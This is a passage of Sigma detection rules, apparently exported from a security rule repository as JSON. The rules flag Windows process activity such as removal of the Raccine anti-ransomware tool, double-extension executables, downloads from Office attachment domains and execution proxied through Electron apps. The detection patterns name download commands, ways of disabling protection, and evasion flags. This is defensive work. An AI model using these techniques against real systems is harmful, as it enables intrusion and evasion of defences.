    "content": "title: Raccine Uninstall\nid: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc\nstatus: test\ndescription: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.\nreferences:\n    - https://github.com/Neo23x0/Raccine\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - 'taskkill '\n            - 'RaccineSettings.exe'\n    selection2:\n        CommandLine|contains|all:\n            - 'reg.exe'\n            - 'delete'\n            - 'Raccine Tray'\n    selection3:\n        CommandLine|contains|all:\n            - 'schtasks'\n            - '/DELETE'\n            - 'Raccine Rules Updater'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate deinstallation by administrative staff\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_double_extension.yml",
    "content": "title: Suspicious Double Extension File Execution\nid: 1cdd9a09-06c9-4769-99ff-626e2b3991b8\nrelated:\n    - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine\n      type: similar\nstatus: stable\ndescription: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns\nreferences:\n    - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html\n    - https://twitter.com/blackorbird/status/1140519090961825792\n    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\nauthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-06-26\nmodified: 2025-05-30\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '      .exe'\n            - '______.exe'\n            - '.doc.exe'\n            - '.doc.js'\n            - '.docx.exe'\n            - '.docx.js'\n            - '.gif.exe'\n            - '.jpeg.exe'\n            - '.jpg.exe'\n            - '.mkv.exe'\n            - '.mov.exe'\n            - '.mp3.exe'\n            - '.mp4.exe'\n            - '.pdf.exe'\n            - '.pdf.js'\n            - '.png.exe'\n            - '.ppt.exe'\n            - '.ppt.js'\n            - '.pptx.exe'\n            - '.pptx.js'\n            - '.rtf.exe'\n            - '.rtf.js'\n            - '.svg.exe'\n            - '.txt.exe'\n            - '.txt.js'\n            - '.xls.exe'\n            - '.xls.js'\n            - '.xlsx.exe'\n            - '.xlsx.js'\n            - '⠀⠀⠀⠀⠀⠀.exe' # Unicode Space Character: Braille Pattern Blank (Unicode: U+2800)\n        CommandLine|contains:\n            - '      .exe'\n            - '______.exe'\n            - '.doc.exe'\n            - '.doc.js'\n            - '.docx.exe'\n            - '.docx.js'\n            - '.gif.exe'\n            - '.jpeg.exe'\n            - '.jpg.exe'\n            - '.mkv.exe'\n            - '.mov.exe'\n            - '.mp3.exe'\n            - '.mp4.exe'\n            - '.pdf.exe'\n            - '.pdf.js'\n            - '.png.exe'\n            - '.ppt.exe'\n            - '.ppt.js'\n            - '.pptx.exe'\n            - '.pptx.js'\n            - '.rtf.exe'\n            - '.rtf.js'\n            - '.svg.exe'\n            - '.txt.exe'\n            - '.txt.js'\n            - '.xls.exe'\n            - '.xls.js'\n            - '.xlsx.exe'\n            - '.xlsx.js'\n            - '⠀⠀⠀⠀⠀⠀.exe' # Unicode Space Character: Braille Pattern Blank (Unicode: U+2800)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml",
    "content": "title: Suspicious Parent Double Extension File Execution\nid: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c\nrelated:\n    - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine\n      type: derived\nstatus: test\ndescription: Detect execution of suspicious double extension files in ParentCommandLine\nreferences:\n    - https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-06\nmodified: 2023-02-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - ParentImage|endswith:\n              - '.doc.lnk'\n              - '.docx.lnk'\n              - '.xls.lnk'\n              - '.xlsx.lnk'\n              - '.ppt.lnk'\n              - '.pptx.lnk'\n              - '.rtf.lnk'\n              - '.pdf.lnk'\n              - '.txt.lnk'\n              - '.doc.js'\n              - '.docx.js'\n              - '.xls.js'\n              - '.xlsx.js'\n              - '.ppt.js'\n              - '.pptx.js'\n              - '.rtf.js'\n              - '.pdf.js'\n              - '.txt.js'\n        - ParentCommandLine|contains:\n              - '.doc.lnk'\n              - '.docx.lnk'\n              - '.xls.lnk'\n              - '.xlsx.lnk'\n              - '.ppt.lnk'\n              - '.pptx.lnk'\n              - '.rtf.lnk'\n              - '.pdf.lnk'\n              - '.txt.lnk'\n              - '.doc.js'\n              - '.docx.js'\n              - '.xls.js'\n              - '.xlsx.js'\n              - '.ppt.js'\n              - '.pptx.js'\n              - '.rtf.js'\n              - '.pdf.js'\n              - '.txt.js'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml",
    "content": "title: Suspicious Download from Office Domain\nid: 00d49ed5-4491-4271-a8db-650a4ef6f8c1\nstatus: test\ndescription: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents\nreferences:\n    - https://twitter.com/an0n_r0/status/1474698356635193346?s=12\n    - https://twitter.com/mrd0x/status/1475085452784844803?s=12\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-27\nmodified: 2022-08-02\ntags:\n    - attack.command-and-control\n    - attack.resource-development\n    - attack.t1105\n    - attack.t1608\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_download:\n        - Image|endswith:\n              - '\\curl.exe'\n              - '\\wget.exe'\n        - CommandLine|contains:\n              - 'Invoke-WebRequest'\n              - 'iwr '\n              - 'curl '\n              - 'wget '\n              - 'Start-BitsTransfer'\n              - '.DownloadFile('\n              - '.DownloadString('\n    selection_domains:\n        CommandLine|contains:\n            - 'https://attachment.outlook.live.net/owa/'\n            - 'https://onenoteonlinesync.onenote.com/onenoteonlinesync/'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml",
    "content": "title: DumpStack.log Defender Evasion\nid: 4f647cfa-b598-4e12-ad69-c68dd16caef8\nstatus: test\ndescription: Detects the use of the filename DumpStack.log to evade Microsoft Defender\nreferences:\n    - https://twitter.com/mrd0x/status/1479094189048713219\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-06\nmodified: 2022-06-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\DumpStack.log'\n    selection_download:\n        CommandLine|contains: ' -o DumpStack.log'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml",
    "content": "title: Always Install Elevated MSI Spawned Cmd And Powershell\nid: 1e53dd56-8d83-4eb4-a43e-b790a05510aa\nstatus: test\ndescription: Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020-10-13\nmodified: 2022-10-20\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_parent:\n        ParentImage|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        ParentImage|endswith: 'tmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml",
    "content": "title: Suspicious Electron Application Child Processes\nid: f26eb764-fd89-464b-85e2-dc4a8e6e77b8\nrelated:\n    - id: 378a05d8-963c-46c9-bcce-13c7657eac99\n      type: similar\nstatus: test\ndescription: |\n    Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\nreferences:\n    - https://taggart-tech.com/quasar-electron/\n    - https://github.com/mttaggart/quasar\n    - https://positive.security/blog/ms-officecmd-rce\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\n    - https://lolbas-project.github.io/lolbas/Binaries/Teams/\n    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\n    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-21\nmodified: 2024-07-12\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more electron based app to the list\n            - '\\chrome.exe' # Might require additional tuning\n            - '\\discord.exe'\n            - '\\GitHubDesktop.exe'\n            - '\\keybase.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\msteams.exe'\n            - '\\slack.exe'\n            - '\\teams.exe'\n            # - '\\code.exe' # Prone to a lot of FPs. Requires an additional baseline\n    selection_child_image:\n        Image|endswith:\n            # Add more suspicious/unexpected paths\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\whoami.exe'\n            - '\\wscript.exe'\n    selection_child_paths:\n        Image|contains:\n            # Add more suspicious/unexpected paths\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    filter_optional_discord:\n        ParentImage|endswith: '\\Discord.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '\\NVSMI\\nvidia-smi.exe'\n    condition: selection_parent and 1 of selection_child_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\n# Increase the level once FP rate is reduced (see status)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml",
    "content": "title: Potentially Suspicious Electron Application CommandLine\nid: 378a05d8-963c-46c9-bcce-13c7657eac99\nrelated:\n    - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.\nreferences:\n    - https://positive.security/blog/ms-officecmd-rce\n    - https://lolbas-project.github.io/lolbas/Binaries/Teams/\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\n    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\n    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\n    - https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\nmodified: 2023-11-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              # Add more electron based app to the list\n              - '\\chrome.exe'\n              - '\\code.exe'\n              - '\\discord.exe'\n              - '\\GitHubDesktop.exe'\n              - '\\keybase.exe'\n              - '\\msedge_proxy.exe'\n              - '\\msedge.exe'\n              - '\\msedgewebview2.exe'\n              - '\\msteams.exe'\n              - '\\slack.exe'\n              - '\\Teams.exe'\n        - OriginalFileName:\n              # Add more electron based app to the list\n              - 'chrome.exe'\n              - 'code.exe'\n              - 'discord.exe'\n              - 'GitHubDesktop.exe'\n              - 'keybase.exe'\n              - 'msedge_proxy.exe'\n              - 'msedge.exe'\n              - 'msedgewebview2.exe'\n              - 'msteams.exe'\n              - 'slack.exe'\n              - 'Teams.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '--browser-subprocess-path'\n            - '--gpu-launcher'\n            - '--renderer-cmd-prefix'\n            - '--utility-cmd-prefix'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for debugging purposes\n# Increase the level once FP rate is known better (see status)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml",
    "content": "title: Elevated System Shell Spawned From Uncommon Parent Location\nid: 178e615d-e666-498b-9630-9ed363038101\nrelated:\n    - id: 61065c72-5d7d-44ef-bf41-6a36684b545f\n      type: similar\nstatus: test\ndescription: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: frack113, Tim Shelton (update fp)\ndate: 2022-12-05\nmodified: 2025-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_shell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'powershell_ise.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        LogonId: '0x3e7'\n    filter_main_generic:\n        # Example 1:\n        #   C:\\Program Files\\erl-23.2\\erts-11.1.4\\bin\\erl.exe\" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers []\n        # Example 2:\n        #   ParentImage: C:\\Program Files (x86)\\Varonis\\DatAdvantage\\GridCollector\\VrnsRealTimeAlertsSvc.exe\" /appid 000000ad-cb03-500b-9459-c46d000000ad\n        #   CommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Program Files \"(x86)\\Varonis\\DatAdvantage\\GridCollector\\handle_scopes.cmd C:\\Collector\" Working Share\\VaronisWorkDirectoryCollector\n        ParentImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\ProgramData\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\Temp\\' # Installers\n            - ':\\Windows\\WinSxS\\'\n    filter_optional_manageengine:\n        # Example:\n        #   ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe\" --forkarch 5380\n        #   CommandLine: C:\\Windows\\system32\\cmd.exe /c \"IF EXIST archive.bat (archive.bat pg_wal\\000000010000008E000000EA 000000010000008E000000EA)\n        ParentImage|endswith: ':\\ManageEngine\\ADManager Plus\\pgsql\\bin\\postgres.exe'\n        Image|endswith: '\\cmd.exe'\n    filter_optional_asgard:\n        CommandLine|contains: ':\\WINDOWS\\system32\\cmd.exe /c \"'\n        CurrentDirectory|contains: ':\\WINDOWS\\Temp\\asgard2-agent\\'\n    filter_optional_ibm_spectrumprotect:\n        ParentImage|contains: ':\\IBM\\SpectrumProtect\\webserver\\scripts\\'\n        CommandLine|contains: ':\\IBM\\SpectrumProtect\\webserver\\scripts\\'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - ''\n            - '-'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate applications may spawn shells from uncommon parent locations. Apply additional filters and perform an initial baseline before deploying.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml",
    "content": "title: Hidden Powershell in Link File Pattern\nid: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a\nstatus: test\ndescription: Detects events that appear when a user click on a link file with a powershell command in it\nreferences:\n    - https://www.x86matthew.com/view_post?id=embed_exe_lnk\nauthor: frack113\ndate: 2022-02-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: C:\\Windows\\explorer.exe\n        Image: C:\\Windows\\System32\\cmd.exe\n        CommandLine|contains|all:\n            - 'powershell'\n            - '.lnk'\n    condition: selection\nfalsepositives:\n    - Legitimate commands in .lnk files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1\nid: 4a30ac0c-b9d6-4e01-b71a-5f851bbf4259\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '😀'\n            - '😃'\n            - '😄'\n            - '😁'\n            - '😆'\n            - '😅'\n            - '😂'\n            - '🤣'\n            - '🥲'\n            - '🥹'\n            - '☺️'\n            - '😊'\n            - '😇'\n            - '🙂'\n            - '🙃'\n            - '😉'\n            - '😌'\n            - '😍'\n            - '🥰'\n            - '😘'\n            - '😗'\n            - '😙'\n            - '😚'\n            - '😋'\n            - '😛'\n            - '😝'\n            - '😜'\n            - '🤪'\n            - '🤨'\n            - '🧐'\n            - '🤓'\n            - '😎'\n            - '🥸'\n            - '🤩'\n            - '🥳'\n            - '😏'\n            - '😒'\n            - '😞'\n            - '😔'\n            - '😟'\n            - '😕'\n            - '🙁'\n            - '☹️'\n            - '😣'\n            - '😖'\n            - '😫'\n            - '😩'\n            - '🥺'\n            - '😢'\n            - '😭'\n            - '😮‍💨'\n            - '😤'\n            - '😠'\n            - '😡'\n            - '🤬'\n            - '🤯'\n            - '😳'\n            - '🥵'\n            - '🥶'\n            - '😱'\n            - '😨'\n            - '😰'\n            - '😥'\n            - '😓'\n            - '🫣'\n            - '🤗'\n            - '🫡'\n            - '🤔'\n            - '🫢'\n            - '🤭'\n            - '🤫'\n            - '🤥'\n            - '😶'\n            - '😶‍🌫️'\n            - '😐'\n            - '😑'\n            - '😬'\n            - '🫠'\n            - '🙄'\n            - '😯'\n            - '😦'\n            - '😧'\n            - '😮'\n            - '😲'\n            - '🥱'\n            - '😴'\n            - '🤤'\n            - '😪'\n            - '😵'\n            - '😵‍💫'\n            - '🫥'\n            - '🤐'\n            - '🥴'\n            - '🤢'\n            - '🤮'\n            - '🤧'\n            - '😷'\n            - '🤒'\n            - '🤕'\n            - '🤑'\n            - '🤠'\n            - '😈'\n            - '👿'\n            - '👹'\n            - '👺'\n            - '🤡'\n            - '💩'\n            - '👻'\n            - '💀'\n            - '☠️'\n            - '👽'\n            - '👾'\n            - '🤖'\n            - '🎃'\n            - '😺'\n            - '😸'\n            - '😹'\n            - '😻'\n            - '😼'\n            - '😽'\n            - '🙀'\n            - '😿'\n            - '😾'\n            - '👋'\n            - '🤚'\n            - '🖐'\n            - '✋'\n            - '🖖'\n            - '👌'\n            - '🤌'\n            - '🤏'\n            - '✌️'\n            - '🤞'\n            - '🫰'\n            - '🤟'\n            - '🤘'\n            - '🤙'\n            - '🫵'\n            - '🫱'\n            - '🫲'\n            - '🫳'\n            - '🫴'\n            - '👈'\n            - '👉'\n            - '👆'\n            - '🖕'\n            - '👇'\n            - '☝️'\n            - '👍'\n            - '👎'\n            - '✊'\n            - '👊'\n            - '🤛'\n            - '🤜'\n            - '👏'\n            - '🫶'\n            - '🙌'\n            - '👐'\n            - '🤲'\n            - '🤝'\n            - '🙏'\n            - '✍️'\n            - '💪'\n            - '🦾'\n            - '🦵'\n            - '🦿'\n            - '🦶'\n            - '👣'\n            - '👂'\n            - '🦻'\n            - '👃'\n            - '🫀'\n            - '🫁'\n            - '🧠'\n            - '🦷'\n            - '🦴'\n            - '👀'\n            - '👁'\n            - '👅'\n            - '👄'\n            - '🫦'\n            - '💋'\n            - '🩸'\n            - '👶'\n            - '👧'\n            - '🧒'\n            - '👦'\n            - '👩'\n            - '🧑'\n            - '👨'\n            - '👩‍🦱'\n            - '🧑‍🦱'\n            - '👨‍🦱'\n            - '👩‍🦰'\n            - '🧑‍🦰'\n            - '👨‍🦰'\n            - '👱‍♀️'\n            - '👱'\n            - '👱‍♂️'\n            - '👩‍🦳'\n            - '🧑‍🦳'\n            - '👨‍🦳'\n            - '👩‍🦲'\n            - '🧑‍🦲'\n            - '👨‍🦲'\n            - '🧔‍♀️'\n            - '🧔'\n            - '🧔‍♂️'\n            - '👵'\n            - '🧓'\n            - '👴'\n            - '👲'\n            - '👳‍♀️'\n            - '👳'\n            - '👳‍♂️'\n            - '🧕'\n            - '👮‍♀️'\n            - '👮'\n            - '👮‍♂️'\n            - '👷‍♀️'\n            - '👷'\n            - '👷‍♂️'\n            - '💂‍♀️'\n            - '💂'\n            - '💂‍♂️'\n            - '🕵️‍♀️'\n            - '🕵️'\n            - '🕵️‍♂️'\n            - '👩‍⚕️'\n            - '🧑‍⚕️'\n            - '👨‍⚕️'\n            - '👩‍🌾'\n            - '🧑‍🌾'\n            - '👨‍🌾'\n            - '👩‍🍳'\n            - '🧑‍🍳'\n            - '👨‍🍳'\n            - '👩‍🎓'\n            - '🧑‍🎓'\n            - '👨‍🎓'\n            - '👩‍🎤'\n            - '🧑‍🎤'\n            - '👨‍🎤'\n            - '👩‍🏫'\n            - '🧑‍🏫'\n            - '👨‍🏫'\n            - '👩‍🏭'\n            - '🧑‍🏭'\n            - '👨‍🏭'\n            - '👩‍💻'\n            - '🧑‍💻'\n            - '👨‍💻'\n            - '👩‍💼'\n            - '🧑‍💼'\n            - '👨‍💼'\n            - '👩‍🔧'\n            - '🧑‍🔧'\n            - '👨‍🔧'\n            - '👩‍🔬'\n            - '🧑‍🔬'\n            - '👨‍🔬'\n            - '👩‍🎨'\n            - '🧑‍🎨'\n            - '👨‍🎨'\n            - '👩‍🚒'\n            - '🧑‍🚒'\n            - '👨‍🚒'\n            - '👩‍✈️'\n            - '🧑‍✈️'\n            - '👨‍✈️'\n            - '👩‍🚀'\n            - '🧑‍🚀'\n            - '👨‍🚀'\n            - '👩‍⚖️'\n            - '🧑‍⚖️'\n            - '👨‍⚖️'\n            - '👰‍♀️'\n            - '👰'\n            - '👰‍♂️'\n            - '🤵‍♀️'\n            - '🤵'\n            - '🤵‍♂️'\n            - '👸'\n            - '🫅'\n            - '🤴'\n            - '🥷'\n            - '🦸‍♀️'\n            - '🦸'\n            - '🦸‍♂️'\n            - '🦹‍♀️'\n            - '🦹'\n            - '🦹‍♂️'\n            - '🤶'\n            - '🧑‍🎄'\n            - '🎅'\n            - '🧙‍♀️'\n            - '🧙'\n            - '🧙‍♂️'\n            - '🧝‍♀️'\n            - '🧝'\n            - '🧝‍♂️'\n            - '🧛‍♀️'\n            - '🧛'\n            - '🧛‍♂️'\n            - '🧟‍♀️'\n            - '🧟'\n            - '🧟‍♂️'\n            - '🧞‍♀️'\n            - '🧞'\n            - '🧞‍♂️'\n            - '🧜‍♀️'\n            - '🧜'\n            - '🧜‍♂️'\n            - '🧚‍♀️'\n            - '🧚'\n            - '🧚‍♂️'\n            - '🧌'\n            - '👼'\n            - '🤰'\n            - '🫄'\n            - '🫃'\n            - '🤱'\n            - '👩‍🍼'\n            - '🧑‍🍼'\n            - '👨‍🍼'\n            - '🙇‍♀️'\n            - '🙇'\n            - '🙇‍♂️'\n            - '💁‍♀️'\n            - '💁'\n            - '💁‍♂️'\n            - '🙅‍♀️'\n            - '🙅'\n            - '🙅‍♂️'\n            - '🙆‍♀️'\n            - '🙆'\n            - '🙆‍♂️'\n            - '🙋‍♀️'\n            - '🙋'\n            - '🙋‍♂️'\n            - '🧏‍♀️'\n            - '🧏'\n            - '🧏‍♂️'\n            - '🤦‍♀️'\n            - '🤦'\n            - '🤦‍♂️'\n            - '🤷‍♀️'\n            - '🤷'\n            - '🤷‍♂️'\n            - '🙎‍♀️'\n            - '🙎'\n            - '🙎‍♂️'\n            - '🙍‍♀️'\n            - '🙍'\n            - '🙍‍♂️'\n            - '💇‍♀️'\n            - '💇'\n            - '💇‍♂️'\n            - '💆‍♀️'\n            - '💆'\n            - '💆‍♂️'\n            - '🧖‍♀️'\n            - '🧖'\n            - '🧖‍♂️'\n            - '💅'\n            - '💃'\n            - '🕺'\n            - '👯‍♀️'\n            - '👯'\n            - '👯‍♂️'\n            - '🕴'\n            - '👩‍🦽'\n            - '🧑‍🦽'\n            - '👨‍🦽'\n            - '👩‍🦼'\n            - '🧑‍🦼'\n            - '👨‍🦼'\n            - '🚶‍♀️'\n            - '🚶'\n            - '🚶‍♂️'\n            - '👩‍🦯'\n            - '🧑‍🦯'\n            - '👨‍🦯'\n            - '🧎‍♀️'\n            - '🧎'\n            - '🧎‍♂️'\n            - '🏃‍♀️'\n            - '🏃'\n            - '🏃‍♂️'\n            - '🧍‍♀️'\n            - '🧍'\n            - '🧍‍♂️'\n            - '👭'\n            - '🧑‍🤝‍🧑'\n            - '👬'\n            - '👫'\n            - '👩‍❤️‍👩'\n            - '💑'\n            - '👨‍❤️‍👨'\n            - '👩‍❤️‍👨'\n            - '👩‍❤️‍💋‍👩'\n            - '💏'\n            - '👨‍❤️‍💋‍👨'\n            - '👩‍❤️‍💋‍👨'\n            - '👪'\n            - '👨‍👩‍👦'\n            - '👨‍👩‍👧'\n            - '👨‍👩‍👧‍👦'\n            - '👨‍👩‍👦‍👦'\n            - '👨‍👩‍👧‍👧'\n            - '👨‍👨‍👦'\n            - '👨‍👨‍👧'\n            - '👨‍👨‍👧‍👦'\n            - '👨‍👨‍👦‍👦'\n            - '👨‍👨‍👧‍👧'\n            - '👩‍👩‍👦'\n            - '👩‍👩‍👧'\n            - '👩‍👩‍👧‍👦'\n            - '👩‍👩‍👦‍👦'\n            - '👩‍👩‍👧‍👧'\n            - '👨‍👦'\n            - '👨‍👦‍👦'\n            - '👨‍👧'\n            - '👨‍👧‍👦'\n            - '👨‍👧‍👧'\n            - '👩‍👦'\n            - '👩‍👦‍👦'\n            - '👩‍👧'\n            - '👩‍👧‍👦'\n            - '👩‍👧‍👧'\n            - '🗣'\n            - '👤'\n            - '👥'\n            - '🫂'\n            - '🧳'\n            - '🌂'\n            - '☂️'\n            - '🧵'\n            - '🪡'\n            - '🪢'\n            - '🧶'\n            - '👓'\n            - '🕶'\n            - '🥽'\n            - '🥼'\n            - '🦺'\n            - '👔'\n            - '👕'\n            - '👖'\n            - '🧣'\n            - '🧤'\n            - '🧥'\n            - '🧦'\n            - '👗'\n            - '👘'\n            - '🥻'\n            - '🩴'\n            - '🩱'\n            - '🩲'\n            - '🩳'\n            - '👙'\n            - '👚'\n            - '👛'\n            - '👜'\n            - '👝'\n            - '🎒'\n            - '👞'\n            - '👟'\n            - '🥾'\n            - '🥿'\n            - '👠'\n            - '👡'\n            - '🩰'\n            - '👢'\n            - '👑'\n            - '👒'\n            - '🎩'\n            - '🎓'\n            - '🧢'\n            - '⛑'\n            - '🪖'\n            - '💄'\n            - '💍'\n            - '💼'\n            - '👋🏻'\n            - '🤚🏻'\n            - '🖐🏻'\n            - '✋🏻'\n            - '🖖🏻'\n            - '👌🏻'\n            - '🤌🏻'\n            - '🤏🏻'\n            - '✌🏻'\n            - '🤞🏻'\n            - '🫰🏻'\n            - '🤟🏻'\n            - '🤘🏻'\n            - '🤙🏻'\n            - '🫵🏻'\n            - '🫱🏻'\n            - '🫲🏻'\n            - '🫳🏻'\n            - '🫴🏻'\n            - '👈🏻'\n            - '👉🏻'\n            - '👆🏻'\n            - '🖕🏻'\n            - '👇🏻'\n            - '☝🏻'\n            - '👍🏻'\n            - '👎🏻'\n            - '✊🏻'\n            - '👊🏻'\n            - '🤛🏻'\n            - '🤜🏻'\n            - '👏🏻'\n            - '🫶🏻'\n            - '🙌🏻'\n            - '👐🏻'\n            - '🤲🏻'\n            - '🙏🏻'\n            - '✍🏻'\n            - '💪🏻'\n            - '🦵🏻'\n            - '🦶🏻'\n            - '👂🏻'\n            - '🦻🏻'\n            - '👃🏻'\n            - '👶🏻'\n            - '👧🏻'\n            - '🧒🏻'\n            - '👦🏻'\n            - '👩🏻'\n            - '🧑🏻'\n            - '👨🏻'\n            - '👩🏻‍🦱'\n            - '🧑🏻‍🦱'\n            - '👨🏻‍🦱'\n            - '👩🏻‍🦰'\n            - '🧑🏻‍🦰'\n            - '👨🏻‍🦰'\n            - 